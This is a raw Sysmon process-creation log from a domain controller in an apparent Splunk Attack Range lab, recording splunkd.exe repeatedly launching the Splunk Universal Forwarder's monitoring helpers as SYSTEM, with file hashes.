AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:18.041{A8622C2F-517E-6078-5907-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039475Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:17.377{A8622C2F-517D-6078-5807-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000039467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:16.696{A8622C2F-517C-6078-5707-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:22.982{A8622C2F-5146-6078-5607-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:21.184{A8622C2F-5145-6078-5507-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:20.518{A8622C2F-5144-6078-5407-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:19.836{A8622C2F-5143-6078-5307-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:44:18.074{A8622C2F-5142-6078-5207-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:17.407{A8622C2F-5141-6078-5107-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039288Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:16.732{A8622C2F-5140-6078-5007-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:22.986{A8622C2F-510A-6078-4F07-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039183Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:21.134{A8622C2F-5109-6078-4E07-00000000AE01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000039171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:20.467{A8622C2F-5108-6078-4D07-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:19.834{A8622C2F-5107-6078-4C07-00000000AE01}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:18.014{A8622C2F-5106-6078-4B07-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039130Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:17.394{A8622C2F-5105-6078-4A07-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:16.727{A8622C2F-5104-6078-4907-00000000AE01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000039032Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:22.973{A8622C2F-50CE-6078-4807-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:21.167{A8622C2F-50CD-6078-4707-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039004Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:20.501{A8622C2F-50CC-6078-4607-00000000AE01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:19.834{A8622C2F-50CB-6078-4507-00000000AE01}5008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:18.052{A8622C2F-50CA-6078-4407-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000038974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:17.388{A8622C2F-50C9-6078-4307-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038964Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:16.718{A8622C2F-50C8-6078-4207-00000000AE01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038842Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:22.973{A8622C2F-5092-6078-4107-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:21.019{A8622C2F-5091-6078-4007-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038815Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:20.491{A8622C2F-5090-6078-3F07-00000000AE01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:41:19.825{A8622C2F-508F-6078-3E07-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:18.065{A8622C2F-508E-6078-3D07-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:17.401{A8622C2F-508D-6078-3C07-00000000AE01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:16.724{A8622C2F-508C-6078-3B07-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038698Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:22.975{A8622C2F-5056-6078-3A07-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
